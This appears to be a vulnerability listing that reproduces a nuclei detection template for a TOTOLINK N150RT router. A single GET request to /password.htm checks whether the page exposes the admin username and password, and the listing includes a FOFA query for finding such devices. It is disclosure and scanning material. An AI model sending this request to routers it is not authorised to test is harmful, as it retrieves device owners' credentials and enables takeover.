totolink-n150rt-password-exposure: TOTOLINK N150RT - Password Exposure

日期: 2025-08-01 | 影响软件: TOTOLINK N150RT | POC: 已公开

漏洞描述

Detects password exposure vulnerability in TOTOLINK N150RT router where sensitive credentials are exposed in the password.htm page.

PoC代码[已公开]

id: totolink-n150rt-password-exposure

info:
  name: TOTOLINK N150RT - Password Exposure
  author: ritikchaddha
  severity: high
  description: |
    Detects password exposure vulnerability in TOTOLINK N150RT router where sensitive credentials are exposed in the password.htm page.
  reference:
    - https://github.com/fizz-is-on-the-way/Iot_vuls/blob/main/N150RT/Information_disclosure_password/imgs/2.png
  metadata:
    verified: true
    max-requests: 1
    vendor: totolink
    fofa-query: title="totolink"
  tags: totolink,router,exposure,credentials,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/password.htm"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "orgpassword="
          - "orgusername="
        condition: and

      - type: word
        part: body
        words:
          - "orgpassword=''"
        negative: true

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e81f8e03ba9cb11c0e5926c48289a7c16c3cb73054de8349f8357b371987f42f02203ebaf20163659be4dab25f32fb5bd2c77f310e541353942dd99ea162b69c2a54:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/totolink-n150rt-password-exposure.yaml